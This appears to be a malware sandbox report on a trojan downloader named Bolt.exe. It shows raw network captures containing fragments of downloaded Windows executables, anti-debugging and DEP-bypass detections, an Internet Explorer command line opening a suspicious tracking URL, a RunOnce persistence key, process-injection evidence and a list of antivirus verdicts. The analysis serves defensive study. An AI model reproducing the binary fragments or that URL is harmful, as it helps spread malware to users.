(&r1p(> rYp(((- ((&rgp(? ((&Þ&ÞR+ è(@ (,ï0=sA rwp 5 èsB oC oD þÞ&Þ440j~E rpoF ,.oG t( -(oH (I ,Þ&~E rpoJ ( oK Þ&Þcc0 sL %oM %o+ % oN % oO ~(9 ~(9 oP s/ % s1 (& o' %io2 o3 o4 (Q 0¨ rópr÷poR &sL %oM %o+ % oN % oO ~(9 ~(9 oS (9 %i5 sT s1 ioU &(& oV rûprGp(W rIprGp(W ( Vrcpr½p( ®~-rpÐ(X oY sZ ~~~([ * received: 2920 socket: 1656	1	2920
recv Oct. 30, 2022, 10:39 a.m.	buffer: HTTP/1.1 200 OK content-length: 417280 x-amz-id-2: tx2dc99db1f5c44d76ab19b-00635dd6bb accept-ranges: bytes last-modified: Fri, 28 Oct 2022 15:53:13 GMT etag: "2e9ab140a1936ec75aa63eb00348bfcd" x-amz-request-id: tx2dc99db1f5c44d76ab19b-00635dd6bb x-amz-version-id: 1666972393277036 content-type: application/octet-stream date: Sun, 30 Oct 2022 01:43:23 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELûî[cà"0Ö¥ À@ À@4¥WÀ¸Ó H.text `.rsrc¸ÓÀÔ@@.reloc \@Bp¥H 9k×nÃ$H¬:#nx´£ Fº#+÷i5èJ³{½=¹åJ×£Ó#ëq7ù4öOGýu0©/"TúÌ²ûöµñ×cº1J#¡Ñv&Ç¶³~Ë¹üÉgyÜ¨(+"°iV¥íU6´?f^2+¯¦ÓO8&IÆÞÀ!ü²Àôî§TO±§iG_D(ûþ+bIwÏñÀl©÷¶SWL'fÞ_$½`iP è¢\|á½FênQ¡iQëTf³³ô²«ÆMZ¼·+áÊ;³{Fvú¾4feMßyÚAÏ,Ýûð-ï-39eÆÊÞ<£æRÔäT{¤¬à~'BG_Ã`÷U!"òX0gÐ=éc g ¥ sU3SÕâ%%nÍw××X\ê89üå\Û÷b^¦³W#P#ÒF¾PÁ6í¬vGÚ¾Í¥rÜ pnMÁ©q×ûÈäïõ.ÜÅ¤Û¤øVÀ10Òq¤bÃñ+å\)n`^ ®êÄ±õÎË¦_¼M<þq0~ÒaÀcFÍ¬SrPåm óâh©ÌHJâÛ»-·Û´g «GNÂì¡ad w8D´Ý½ýQ I!ÃåzÉòÚÎfòå©0ffQø.#â{ ²0Åt8>\|g@bUøç]û ÅrÀôþûÏuÓmý)I Âí.»Àd²ÎE]× _ ?Âi¨,sÛoªÊÛÝkìeæüèDð&-dX\|ÈÉ¿:(9G^Lª© V²#¹bî}\|Ïö£¡(aè²öcVx¹DpÉþ ÄßêUPú][^y[dÔR¢Åsøv$ºÉUxÕ0³9IÑGÿÚ~b.ÀI$~·zA,9¨¤æð'9¹ç¼3é¨¤¢R^4°]øKªìgà±iÉ»K£Ã³ãrkNç¨?ícC\|f AÔP3¤/»Q´@ýö9DÜ°M^z³_ÁÉÈf_4^<M?pÀrõ,iÐàKC]óy8ÌÀðhíGk¯90·{û(ß×Y.)A(Ñàÿ¶a"e3äG°ÊÂÿx5ÈÇ#Î\|¯È/ò4^Kïé]Ã'~ç v«³wÆ÷LÄmòütt}±RÃ/"¦È_RZ¼öÑÐßY`Ð°çÚ$C¿û&ë¬¨ù]çÝû(9ÏIiyÄ-éLºrdjæéqÚz°`WRÖZXîS Á JÜ¸»ð?nM÷îH<tÁî§,P_Ã¢ì$z jí<À4¥"¦ÄÃ¦mX·£DÓn"2VZã¨Êp_-¶Ý#&IN#¥eE¦áõpÀÕÛ¨û§_à+yH><THTB[$ vpG:7uÔWûTÿuðþ ôXÌ®t Ü"ÊàAÙXÌóS+ûY.veÙö§öÇr3MåßU½¸èJ+Ó òzðll03ßH"'gÊv»å%Ì?Ïû¶XÌÁI.NO\| ¾@þÍñPnÔ#Îc%'ø]¦^TÅÒ ûíúnXæm2]ð1o©ÄS\|Óø·gÏ=c;&»¤0öNËAÂÑ]Ûþ#¨ÆÜÍZ47£º\|Ô(dx¯(I(Lwa°[3£Z9](²ß&vÔ¸òr%7 ¼?JÚÈ{'Tß:÷d©qú=Ê}á5 ¥&tF&~Á+"i¶1_&O!N¡'^Z£X>³Íç#,x®Î=L®£â?ÇJÓÁ¤t«ïZ´ÿðÑ'÷!¡ð@©¼Ã¡é }>tGê+]0}<ã7mµãv$¼!ó9?RÃöVp3IÿzÆûðoÜ4ÇésÄ{D)¦×Óx¶mC2ì¯ir±B"2Õ<F ì »ýÇ ¦¬Ê>¡UJ0ß1Üv[ÐMíÂwí¹5þ¼e×¡¿Êÿ^U5~µ[U3åE±ñ/ÿÛ#0àh÷Ë÷LW.\|´'`{!)¯OÂT#¥;óQA98/k{¿y/tü\BâÅ}F]ýzi¶#·O´s ²+,¿\|Ï3éÐÝJ8þQÐ«Ø»Y!ªÑµÌú¿ K:ý³N1HÂ»W¸ÕË®» ¯XEröou»0JQuþÇüN~È!C-DTÊhp¬5Î"BNM±{lùt©&êGåvSÛÜsÏ\|Qñ¦Ö««½më¶S¸½_îÛÖIz8¦¿éÁÌnáó«T«¼;.w¿Ùâ@(\|i3%ÉYêoCÆYÔ{÷jÙ¡Ðée°hhûë\o;ÝnëGéÖÚ-#Î\LC>Ä0& received: 2920 socket: 1604	1	2920
recv Oct. 30, 2022, 10:39 a.m.	buffer: HTTP/1.1 200 OK content-length: 600576 x-amz-id-2: tx2470c0738cc84e61b53a8-00635dd6bd accept-ranges: bytes last-modified: Fri, 28 Oct 2022 15:53:06 GMT etag: "61ab40de59e48a1c60446f3dbe1a5f35" x-amz-request-id: tx2470c0738cc84e61b53a8-00635dd6bd x-amz-version-id: 1666972386938225 content-type: application/octet-stream date: Sun, 30 Oct 2022 01:43:25 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELGò[cà"0x° @ @ÀK ` H.textv x `.rsrc ®z@@.reloc` ( @BðHÐrð"?EFtöÙRååýè=É½8`~l¡L¡äÊ U¯Éö ¬vcã¤^ QxÀ.pÙ©73Zÿ÷=ìoÉHÓµö#Náj}¿ç4(ÕjCÿ©»Úhí[]òó;#,«ì¬¨F1@ýíîxKÐ'PÒ7ÿÈûQ)}¨ØË´ Ýó4ï´~äG¢dD¯&~Ó'Q)!ý¶ÀQÎÓòÔ¨/áOÂD?;hA/ét´³VÊ+-T@>":2>{8-û£ØÃiþ#þ®Ó÷Ûé#º«3äºêJ\|õô£<?ïß B<AE JÔ/3ÿWODîå&ýYÔJîÖ¶ªL7µESÚÇÛÿTÿ:®Ò ÇJsv×InI3Z»0YµM¬Çá»kjn£ÔPÞ9îâL~Pë:í8ßº_ÑUi×Ó)u¼U¹Þêk¶u{5á'dO<úMéúÓÜÇ·ùºØ¹gà9Eã]}ë¶Ëû¼Ó5<·84ÒÿQòÑÂ½] ¡Ý¥¥íêµ±¼òS÷óòô¤1eb¾,Î^Cm?¡aÛZ]¥d) ìý<óÒÔòvÙáÂë¢¥©µ]àîp8ÖeÌ4ÒP@Tî¿pã!»©ñ·£Wì³òC!áóE>O¹Ã\/APeîE,Ü]S4;ðBÿyËÓ& ÒOÎsKK+0¡'¡x$câîñÎ³°d."÷ÖÓvÁéÒmÊD°cr¥áÌu U·¼æÀ}¦W$5ýZÑ\{«-ôkT\[·6ôÚóKÛ6úR2µµÁK½¿¹`]ÌüÛäm ¡((0å¿Àò¡Ý/lÕàÝ¿;·UÜM(V\ß£Ã½X PÖÀH·xðýHù¶Æy âÕý%f \<]rXá!, íõä=1¯8qÑ¾sùXs¡í$6HÓXPÂ±~È?íÇÔªPÞ$]âF©Ð6«Î(3 tgù¯X¢áøªâ±ÍZ°éwöï±`u7Ò³öá~í)k¿;´p1U^;f%búòf$Îïÿgk>Õ)L5àdceÞ;§¬Ï:D&M-pÒ8³§m§×M^Òñ\Û¦ÉÉªoê~>ÎºV=£-Â'V;gg;+v2¹jE»m²/é<mËÞ û¡[5M^Òñ\Û¦ÉÉï¨K²ðw©3òõáªÒÞ«P¶V×]ï ù]æ&þdûï¦Vß#(¢ÖÕk=D#t mzëÒ2áèç«åãè²õâ<LåÞ¿v_£C]ß°üÖsT {k&7SÄQîZúZä¶ZÞ´dµµuª!ËýuU>«ª6ÎKóûc>þÕºØQfn¦=ß©ËvBÒ/ð¸:âËº` $¥ ÝIML4ßÊöTH:ZgR»¯ý(°Ì\k\:\|EÏÌ8(XË¿ÐpÍÆQüÆlbëkoq{-â <XÇ/µT¡ÞUIFe^õ¡,+yá/ 4WÁïòÒ¦¯'¢Ï/v½óad4 åIèÐÓ oëøX¬qÈPºcÑÛWU;x]êï ô"ãèÉ®ôajâï$ÇH·0Î¦×}Koi¿»\|LUp¡©æÂ@ËKµÔ ¢Îý®.þ¶prâ¥¿$Ê3is=J3<27Ðe¶¥ïGÅYtÞö Åù¿ÍQ$r\¬0Õ[µ¥A\Î+OYIÈaép¤ÃC«8ßÐ 5;ûG¨_AfN§©«ÐêÍTÛò®ß¼bw@iú¡=Ðí¹[±ì§PcCÁ Aùçèõ&Be²ÕéJy\|%È³lç¯äéÁÑ×Ë® Fæý6z[@@R!ÔR¶Æ½sr¡¶3J¹2þh+ë!ÿBÍAÓMµ^U´hÌL·® &Y gÒ(n§uYÔäÇÔNÒ¨°ªm- M øöâ&ú#ø!&@Ü.GØ2>üÛÐvË÷å²6#ä8UÃSOÖì]Ú¾rI^Ab+ÞÏ³ºUÒ¸×«Þ¦MzYæj á)g sÑdàq¾Ä4j®Ö`ïEög+×Ni©v¨ÞÔè·Ö3P+dsç8©Gw:g;®¦\|,´ÿYîEkôÊûÅ]¯º±pÔêÊ®Ó.t@÷'`µq\|ªý×BoyáD/¹Hì ¦LÙ°Îô¾8¶;¿IàY«¡ÛiÐK¾Ç;ÇÖæðÉ#&ãAÇ£»kû.cqÈÓJÿü received: 2920 socket: 1604	1	2920

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
cmdline	C:\Program Files (x86)\Internet Explorer\iexplore.exe https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1852 CREDAT:145409

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover

reg_value

"C:\Program Files (x86)\Google\Wyhaehawoshy.exe"

Network activity contains more than one unique useragent (2 events)

process	Bolt.tmp				useragent	InnoDownloadPlugin/1.5
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1852 resumed a thread in remote process 1616
NtResumeThread Oct. 30, 2022, 10:40 a.m.	thread_handle: 0x00000358 suspend_count: 1 process_identifier: 1616	1	0	0

Generates some ICMP traffic

File has been identified by 26 AntiVirus engines on VirusTotal as malicious (26 events)

Lionic	Trojan.Win32.Generic.4!c
DrWeb	Trojan.Siggen13.45201
McAfee	Artemis!96ECD3B0E089
Cylance	Unsafe
CrowdStrike	win/malicious_confidence_60% (W)
VirIT	Adware.Win32.Dwnldr.ME
Symantec	Trojan.Gen.MBT
Elastic	malicious (high confidence)
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:Trojan-Downloader.MSIL.Csdi.er
SUPERAntiSpyware	Backdoor.Manuscrypt/Variant
Avast	FileRepMalware [Misc]
TrendMicro	Trojan.Win32.PRIVATELOADER.YXCJ3Z
McAfee-GW-Edition	BehavesLike.Win32.AdwareFileTour.fc
Sophos	Generic ML PUA (PUA)
Avira	HEUR/AGEN.1233171
Gridinsoft	Trojan.Win32.Downloader.sa
Microsoft	Trojan:Script/Phonzy.A!ml
Cynet	Malicious (score: 99)
AhnLab-V3	Trojan/Win.Generic.C5238716
Malwarebytes	Trojan.Downloader
MaxSecure	Trojan.Malware.8909117.susgen
Fortinet	W32/PossibleThreat
AVG	FileRepMalware [Misc]
Cybereason	malicious.0dec90

Bolt.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All